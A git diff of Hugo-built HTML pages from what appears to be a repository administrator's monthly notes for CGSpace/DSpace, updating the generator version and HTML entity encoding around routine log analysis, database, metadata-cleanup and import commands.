@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -193,14 +193,14 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
</code></pre><ul>
<li>It actually got mostly HTTP 200 responses:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | awk &#39;{print $9}&#39; | sort | uniq -c
1775 200
703 499
72 503
</code></pre><ul>
<li>And it was mostly requesting Discover pages:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
2350 discover
71 handle
</code></pre><ul>
@ -284,11 +284,11 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Around the same time I see the following in the DSpace log:</li>
</ul>
<pre tabindex="0"><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&quot;METSRIGHTS&quot;
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&#34;METSRIGHTS&#34;
</code></pre><ul>
<li>I see a lot of these errors today, but not earlier this month:</li>
</ul>
<pre tabindex="0"><code># grep -c 'Cannot find named plugin' dspace.log.2019-09-*
<pre tabindex="0"><code># grep -c &#39;Cannot find named plugin&#39; dspace.log.2019-09-*
dspace.log.2019-09-01:0
dspace.log.2019-09-02:0
dspace.log.2019-09-03:0
@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
</code></pre><ul>
<li>Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:</li>
</ul>
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.METSRightsCrosswalk&quot;, name=&quot;METSRIGHTS&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.OREDisseminationCrosswalk&quot;, name=&quot;ore&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&quot;, name=&quot;dim&quot;
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.METSRightsCrosswalk&#34;, name=&#34;METSRIGHTS&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.OREDisseminationCrosswalk&#34;, name=&#34;ore&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&#34;, name=&#34;dim&#34;
</code></pre><ul>
<li>I restarted Tomcat and the item views came back, but then the Solr statistics cores didn&rsquo;t all load properly
<ul>
@ -326,9 +326,9 @@ dspace.log.2019-09-15:808
# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications
@ -339,26 +339,26 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Kihara, Job&quot;,&quot;Job Kihara: 0000-0002-4394-9553&quot;
&quot;Twyman, Jennifer&quot;,&quot;Jennifer Twyman: 0000-0002-8581-5668&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Arango, Jacobo&quot;,&quot;Jacobo Arango: 0000-0002-4828-9398&quot;
&quot;Chavarriaga Aguirre, Paul&quot;,&quot;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&quot;
&quot;Paul, Birthe&quot;,&quot;Birthe Paul: 0000-0002-5994-5354&quot;
&quot;Eitzinger, Anton&quot;,&quot;Anton Eitzinger: 0000-0001-7317-3381&quot;
&quot;Hoek, Rein van der&quot;,&quot;Rein van der Hoek: 0000-0003-4528-7669&quot;
&quot;Aranzales Rondón, Ericson&quot;,&quot;Ericson Aranzales Rondon: 0000-0001-7487-9909&quot;
&quot;Staiger-Rivas, Simone&quot;,&quot;Simone Staiger: 0000-0002-3539-0817&quot;
&quot;de Haan, Stef&quot;,&quot;Stef de Haan: 0000-0001-8690-1886&quot;
&quot;Pulleman, Mirjam&quot;,&quot;Mirjam Pulleman: 0000-0001-9950-0176&quot;
&quot;Abera, Wuletawu&quot;,&quot;Wuletawu Abera: 0000-0002-3657-5223&quot;
&quot;Tamene, Lulseged&quot;,&quot;Lulseged Tamene: 0000-0002-3806-8890&quot;
&quot;Andrieu, Nadine&quot;,&quot;Nadine Andrieu: 0000-0001-9558-9302&quot;
&quot;Ramírez-Villegas, Julián&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&#34;Kihara, Job&#34;,&#34;Job Kihara: 0000-0002-4394-9553&#34;
&#34;Twyman, Jennifer&#34;,&#34;Jennifer Twyman: 0000-0002-8581-5668&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Arango, Jacobo&#34;,&#34;Jacobo Arango: 0000-0002-4828-9398&#34;
&#34;Chavarriaga Aguirre, Paul&#34;,&#34;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&#34;
&#34;Paul, Birthe&#34;,&#34;Birthe Paul: 0000-0002-5994-5354&#34;
&#34;Eitzinger, Anton&#34;,&#34;Anton Eitzinger: 0000-0001-7317-3381&#34;
&#34;Hoek, Rein van der&#34;,&#34;Rein van der Hoek: 0000-0003-4528-7669&#34;
&#34;Aranzales Rondón, Ericson&#34;,&#34;Ericson Aranzales Rondon: 0000-0001-7487-9909&#34;
&#34;Staiger-Rivas, Simone&#34;,&#34;Simone Staiger: 0000-0002-3539-0817&#34;
&#34;de Haan, Stef&#34;,&#34;Stef de Haan: 0000-0001-8690-1886&#34;
&#34;Pulleman, Mirjam&#34;,&#34;Mirjam Pulleman: 0000-0001-9950-0176&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Tamene, Lulseged&#34;,&#34;Lulseged Tamene: 0000-0002-3806-8890&#34;
&#34;Andrieu, Nadine&#34;,&#34;Nadine Andrieu: 0000-0001-9558-9302&#34;
&#34;Ramírez-Villegas, Julián&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
</code></pre><ul>
<li>I tested the file on my local development machine with the following invocation:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In my test environment this added 390 ORCID identifier</li>
<li>I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update</li>
@ -386,11 +386,11 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
<li>Follow up with Marissa again about the CCAFS phase II project tags</li>
<li>Generate a list of the top 1500 authors on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I used <code>csvcut</code> to select the column of author names, strip the header and quote characters, and saved the sorted file:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/&quot;//g' | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed &#39;s/&#34;//g&#39; | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>After adding the XML formatting back to the file I formatted it using XML tidy:</li>
</ul>
@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ perl-rename -n 's/_{2,3}/_/g' *.pdf
<pre tabindex="0"><code>$ perl-rename -n &#39;s/_{2,3}/_/g&#39; *.pdf
</code></pre><ul>
<li>I was going preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
<ul>
@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ rename -v 's/___/_/g' *.pdf
$ rename -v 's/__/_/g' *.pdf
<pre tabindex="0"><code>$ rename -v &#39;s/___/_/g&#39; *.pdf
$ rename -v &#39;s/__/_/g&#39; *.pdf
</code></pre><ul>
<li>I&rsquo;m still waiting to hear what Carol and Francesca want to do with the <code>1195.pdf.LCK</code> file (for now I&rsquo;ve removed it from the CSV, but for future reference it has the number 630 in its permalink)</li>
<li>I wrote two fairly long GREL expressions to clean up the institutional author names in the <code>dc.contributor.author</code> and <code>dc.identifier.citation</code> fields using OpenRefine
<ul>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&quot;:</li>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&rdquo;:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&#34;&#34;)
</code></pre><ul>
<li>The second targets cities and countries after names like &ldquo;International Livestock Research Intstitute, Kenya&rdquo;:</li>
</ul>
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&quot;&quot;)
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&#34;&#34;)
</code></pre><ul>
<li>I imported the 1,427 Bioversity records with bitstreams to a new collection called <a href="https://dspacetest.cgiar.org/handle/10568/103688">2019-09-20 Bioversity Migration Test</a> on DSpace Test (after splitting them in two batches of about 700 each):</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx768m&#39;
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
</code></pre><ul>
@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
</li>
<li>Get a list of institutions from CCAFS&rsquo;s Clarisa API and try to parse it with <code>jq</code>, do some small cleanups and add a header in <code>sed</code>, and then pass it through <code>csvcut</code> to add line numbers:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
</code></pre><ul>
<li>The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode</li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -113,7 +113,7 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]&#39; ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
</code></pre><ul>
<li>Then I replace them in vim with <code>:% s/\%u00a0/ /g</code> because I can&rsquo;t figure out the correct sed syntax to do it directly from the pipe above</li>
<li>I uploaded those to CGSpace and then re-exported the metadata</li>
@ -121,7 +121,7 @@
<li>I modified the script so it replaces the non-breaking spaces instead of removing them</li>
<li>Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):</li>
</ul>
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x &#39;dc.date.issued,dc.date.issued[],dc.date.issued[en_US]&#39; -u
</code></pre><ul>
<li>That fixed 153 items (unnecessary Unicode, duplicates, commaspace fixes, etc)</li>
<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.1">version 0.3.1 of the csv-metadata-quality script</a> with the non-breaking spaces change</li>
@ -134,7 +134,7 @@
<ul>
<li>Create an account for Bioversity&rsquo;s ICT consultant Francesco on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p &#39;fffff&#39;
</code></pre><ul>
<li>Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
<ul>
@ -193,20 +193,20 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><h2 id="2019-10-11">2019-10-11</h2>
<ul>
<li>I ran the DSpace cleanup function on CGSpace and it found some errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(171221) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(171221) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution, as always, is (repeat as many times as needed):</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);&#39;
UPDATE 1
</code></pre><h2 id="2019-10-12">2019-10-12</h2>
<ul>
@ -229,12 +229,12 @@ International Centre for Tropical Agriculture,International Center for Tropical
International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
&quot;Agricultural Information Resource Centre, Kenya.&quot;,&quot;Agricultural Information Resource Centre, Kenya&quot;
&quot;Centre for Livestock and Agricultural Development, Cambodia&quot;,&quot;Centre for Livestock and Agriculture Development, Cambodia&quot;
&#34;Agricultural Information Resource Centre, Kenya.&#34;,&#34;Agricultural Information Resource Centre, Kenya&#34;
&#34;Centre for Livestock and Agricultural Development, Cambodia&#34;,&#34;Centre for Livestock and Agriculture Development, Cambodia&#34;
</code></pre><ul>
<li>Then I applied it with my <code>fix-metadata-values.py</code> script on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f from -m 211 -t to
</code></pre><ul>
<li>I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
<ul>
@ -270,7 +270,7 @@ real 82m35.993s
</code></pre><ul>
<li>I looked in the database to find authors that had &ldquo;|&rdquo; in them:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE &#39;%|%&#39;;
text_value | resource_id
----------------------------------+-------------
Anandajayasekeram, P.|Puskur, R. | 157
@ -280,7 +280,7 @@ real 82m35.993s
</code></pre><ul>
<li>Then I found their handles and corrected them, for example:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;157&#39; and handle.resource_type_id=2;
handle
-----------
10568/129
@ -304,10 +304,10 @@ real 82m35.993s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ mkdir 2019-10-15-Bioversity
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
$ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&gt;/d' 2019-10-15-Bioversity/*/dublin_core.xml
$ sed -i &#39;/&lt;dcvalue element=&#34;identifier&#34; qualifier=&#34;uri&#34;&gt;/d&#39; 2019-10-15-Bioversity/*/dublin_core.xml
</code></pre><ul>
<li>It&rsquo;s really stupid, but for some reason the handles are included even though I specified the <code>-m</code> option, so after the export I removed the <code>dc.identifier.uri</code> metadata values from the items</li>
<li>Then I imported a test subset of them in my local test environment:</li>
@ -317,7 +317,7 @@ $ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&
<li>I had forgotten (again) that the <code>dspace export</code> command doesn&rsquo;t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import&hellip;</li>
<li>On CGSpace I will increase the RAM of the command line Java process for good luck before import&hellip;</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
</code></pre><ul>
<li>After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them</li>

View File

@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
" />
<meta property="og:type" content="article" />
@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -152,22 +152,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
